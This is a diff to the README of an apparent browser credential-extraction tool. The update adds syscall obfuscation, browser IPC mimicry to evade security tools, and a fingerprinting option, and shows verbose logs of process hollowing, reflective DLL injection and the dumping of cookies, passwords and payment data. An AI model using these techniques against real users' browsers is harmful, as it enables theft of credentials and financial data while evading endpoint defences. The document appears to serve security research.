@@ -33,11 +33,14 @@ This tool's effectiveness is rooted in a combination of modern, evasion-focused
3333- 🔓 Full user-mode decryption of cookies, passwords, and payment methods.
3434- 📁 Discovers and processes all user profiles (Default, Profile 1, etc.).
3535- 📝 Exports all extracted data into structured JSON files, organized by profile.
36+ - 🔍 Browser Fingerprinting of browser metadata and system information.
3637
3738### Stealth & Evasion
3839
3940- 🛡️ ** Fileless Payload Delivery:** In-memory decryption and injection of an encrypted resource.
4041- 🛡️ ** Direct Syscall Engine:** Bypasses common endpoint defenses by avoiding hooked user-land APIs for all process operations.
42+ - 🛡️ ** Syscall Obfuscation:** Runtime XOR encryption of syscall table in memory to evade detection by security tools.
43+ - 🛡️ ** IPC Mimicry:** Browser-specific named pipe patterns that blend with legitimate browser IPC traffic.
4144- 🤫 ** Process Hollowing:** Creates a benign, suspended host process for the payload, avoiding injection into potentially monitored processes.
4245- 👻 ** Reflective DLL Injection:** Stealthily loads the payload without suspicious ` LoadLibrary ` calls.
4346- 🔒 ** Proactive File-Lock Mitigation:** Automatically terminates browser utility processes that hold locks on target database files.
@@ -57,9 +60,9 @@ This tool's effectiveness is rooted in a combination of modern, evasion-focused
5760
5861| Browser | Tested Version (x64 & ARM64) |
5962| ------------------ | ---------------------------- |
60- | ** Google Chrome** | 139 .0.7258.139 |
61- | ** Brave** | 1.81.136 (139 .0.7258.143) |
62- | ** Microsoft Edge** | 140 .0.3485.14 |
63+ | ** Google Chrome** | 141 .0.7390.66 |
64+ | ** Brave** | 1.83.109 (141 .0.7390.55) |
65+ | ** Microsoft Edge** | 141 .0.3537.57 |
6366
6467## 🔬 Technical Workflow
6568
@@ -119,14 +122,15 @@ _________ .__ ___________.__ __
119122 \/ \/ \/ \/ \/ \/
120123
121124 Direct Syscall-Based Reflective Hollowing
122- x64 & ARM64 | v0.15 .0 by @xaitax
125+ x64 & ARM64 | v0.16 .0 by @xaitax
123126
124127Usage:
125128 chrome_inject.exe [options] < chrome| brave| edge| all>
126129
127130Options:
128131 --output-path| -o < path> Directory for output files (default: .\o utput\)
129132 --verbose| -v Enable verbose debug output from the injector
133+ --fingerprint| -f Extract browser fingerprinting data
130134 --help| -h Show this help message
131135
132136Browser targets:
@@ -138,8 +142,6 @@ Browser targets:
138142
139143# ## Options
140144
141- Options
142-
143145- ` --output-path < path> ` or ` -o < path> `
144146 Specifies the base directory for output files.
145147 Defaults to ` .\o utput\` relative to the injector' s location.
@@ -148,6 +150,10 @@ Options
148150- `--verbose` or `-v`
149151 Enable extensive debugging output from the injector.
150152
153+ - `--fingerprint` or `-f`
154+ Extract comprehensive browser fingerprinting data including version, extensions, security settings, and system information.
155+ Results saved to `fingerprint.json` in the browser' s output directory.
156+
151157- ` --help` or ` -h`
152158 Show this help message.
153159
@@ -163,7 +169,7 @@ _________ .__ ___________.__ __
163169 \/ \/ \/ \/ \/ \/
164170
165171 Direct Syscall-Based Reflective Hollowing
166- x64 & ARM64 | v0.15 .0 by @xaitax
172+ x64 & ARM64 | v0.16 .0 by @xaitax
167173
168174[* ] Processing 3 browser(s):
169175
@@ -188,7 +194,7 @@ _________ .__ ___________.__ __
188194# ### Verbose
189195
190196` ` ` bash
191- PS> .\chromelevator.exe chrome -v
197+ PS> .\c hromelevator.exe chrome -v -f
192198_________ .__ ___________.__ __
193199\_ ___ \| | _________ ____ _____ \_ _____/| | _______ _______ _/ | _ ___________
194200/ \ \/ | | \_ __ \/ _ \ / \ | __)_ | | _/ __ \ \/ /\_ _ \\ __\/ _ \_ __ \
@@ -197,23 +203,24 @@ _________ .__ ___________.__ __
197203 \/ \/ \/ \/ \/ \/
198204
199205 Direct Syscall-Based Reflective Hollowing
200- x64 & ARM64 | v0.15 .0 by @xaitax
206+ x64 & ARM64 | v0.16 .0 by @xaitax
201207
202208[# ] Found and sorted 489 Zw* functions.
203- [#] Initialized 19 syscall stubs.
209+ [# ] Initialized 19 syscall stubs (with obfuscation).
210+ [# ] Obfuscation layer active - syscalls encrypted in memory
204211[# ] Searching Registry for: chrome.exe
205212[# ] Found at: C:\Program Files\Google\Chrome\Application\chrome.exe
206213[# ] Scanning for and terminating browser network services...
207214[# ] Creating suspended Chrome process.
208215[# ] Target executable path: C:\Program Files\Google\Chrome\Application\chrome.exe
209- [#] Created suspended process PID: 16392
216+ [# ] Created suspended process PID: 21708
210217[# ] Architecture match: Injector=ARM64, Target=ARM64
211- [#] Named pipe server created: \\.\pipe\b4de02e0-297f-4910-8b5a-51ee0f3804ac
218+ [# ] Named pipe server created: \\.\pipe\chrome.sync.9707.22756.1BE8
212219[# ] Loading and decrypting payload DLL.
213220[# ] Parsing payload PE headers for ReflectiveLoader.
214- [#] ReflectiveLoader found at file offset: 0x14a50
221+ [# ] ReflectiveLoader found at file offset: 0x17930
215222[# ] Allocating memory for payload in target process.
216- [#] Combined memory for payload and parameters allocated at: 0x24706250000
223+ [# ] Combined memory for payload and parameters allocated at: 0x243d93a0000
217224[# ] Writing payload DLL to target process.
218225[# ] Writing pipe name parameter into the same allocation.
219226[# ] Changing payload memory protection to executable.
@@ -223,8 +230,9 @@ _________ .__ ___________.__ __
223230[# ] Waiting for payload to connect to named pipe.
224231[# ] Payload connected to named pipe.
225232[# ] Sent message to pipe: VERBOSE_TRUE
233+ [# ] Sent message to pipe: FINGERPRINT_TRUE
226234[# ] Sent message to pipe: C:\Users\ah\Documents\GitHub\Chrome-App-Bound-Encryption-Decryption\output
227- [#] Waiting for payload execution. (Pipe: \\.\pipe\b4de02e0-297f-4910-8b5a-51ee0f3804ac )
235+ [# ] Waiting for payload execution. (Pipe: \\.\pipe\chrome.sync.9707.22756.1BE8 )
228236
229237[* ] Decryption process started for Chrome
230238[+] COM library initialized (APARTMENTTHREADED).
@@ -234,21 +242,23 @@ _________ .__ ___________.__ __
234242[*] Discovering browser profiles in: C:\Users\ah\AppData\Local\Google\Chrome\User Data
235243[+] Found 2 profile(s).
236244[*] Processing profile: Default
237- [* ] 371 cookies extracted to C:\U sers\a h\D ocuments\G itHub\C hrome-App-Bound-Encryption-Decryption\o utput\C hrome\D efault\c ookies.json
245+ [*] 380 cookies extracted to C:\Users\ah\Documents\GitHub\Chrome-App-Bound-Encryption-Decryption\output\Chrome\Default\cookies.json
238246 [*] 1 passwords extracted to C:\Users\ah\Documents\GitHub\Chrome-App-Bound-Encryption-Decryption\output\Chrome\Default\passwords.json
239247[*] Processing profile: Profile 1
240- [* ] 110 cookies extracted to C:\U sers\a h\D ocuments\G itHub\C hrome-App-Bound-Encryption-Decryption\o utput\C hrome\P rofile 1\c ookies.json
241- [* ] 1 passwords extracted to C:\U sers\a h\D ocuments\G itHub\C hrome-App-Bound-Encryption-Decryption\o utput\C hrome\P rofile 1\p asswords.json
248+ [*] 131 cookies extracted to C:\Users\ah\Documents\GitHub\Chrome-App-Bound-Encryption-Decryption\output\Chrome\Profile 1\cookies.json
249+ [*] 2 passwords extracted to C:\Users\ah\Documents\GitHub\Chrome-App-Bound-Encryption-Decryption\output\Chrome\Profile 1\passwords.json
242250 [*] 1 payments extracted to C:\Users\ah\Documents\GitHub\Chrome-App-Bound-Encryption-Decryption\output\Chrome\Profile 1\payments.json
243- [* ] All profiles processed. Decryption process finished.
251+ [*] Extraction complete: 2 successful, 0 failed.
252+ [*] Extracting browser fingerprint data...
253+ [*] Discovering browser profiles in: C:\Users\ah\AppData\Local\Google\Chrome\User Data
254+ [+] Found 2 profile(s).
255+ [+] Browser fingerprint extracted to C:\Users\ah\Documents\GitHub\Chrome-App-Bound-Encryption-Decryption\output\Chrome\fingerprint.json
244256[#] Payload completion signal received.
245257
246258[#] Payload signaled completion or pipe interaction ended.
247- [# ] Terminating browser PID=16392 via direct syscall.
259+ [#] Terminating browser PID=21708 via direct syscall.
248260[#] Chrome terminated by injector.
249- [+]
250- Extraction completed successfully
251- [# ] Injector finished successfully.
261+ [+] Extraction completed successfully
252262```
253263
254264## 📂 Data Extraction
@@ -328,6 +338,36 @@ Each payment file is a JSON array of objects:
328338]
329339```
330340
341+ ### 🔍 Browser Fingerprinting
342+
343+ When using the `--fingerprint` flag, a comprehensive metadata report is generated:
344+
345+ ```json
346+ {
347+ "browser": "Brave",
348+ "browser_version": "141.1.83.109",
349+ "executable_path": "C:\\Program Files\\BraveSoftware\\Brave-Browser\\Application\\brave.exe",
350+ "user_data_path": "C:\\Users\\username\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data",
351+ "sync_enabled": false,
352+ "enterprise_managed": false,
353+ "update_channel": "stable",
354+ "default_search_engine": "Google",
355+ "hardware_acceleration": true,
356+ "autofill_enabled": true,
357+ "password_manager_enabled": true,
358+ "safe_browsing_enabled": true,
359+ "installed_extensions_count": 12,
360+ "extension_ids": ["abc123...", "def456...", ...],
361+ "profile_count": 1,
362+ "computer_name": "DESKTOP-ABC123",
363+ "windows_user": "username",
364+ "last_config_update": 1759127932,
365+ "extraction_timestamp": 1759213456
366+ }
367+ ```
368+
369+ This data provides intelligence about the browser' s configuration, security posture, and system context.
370+
331371# # 📚 In-Depth Technical Analysis & Research
332372
333373For a comprehensive understanding of Chrome' s App-Bound Encryption, the intricacies of its implementation, the detailed mechanics of this tool' s approach, and a broader discussion of related security vectors, please refer to my detailed research paper:
0 commit comments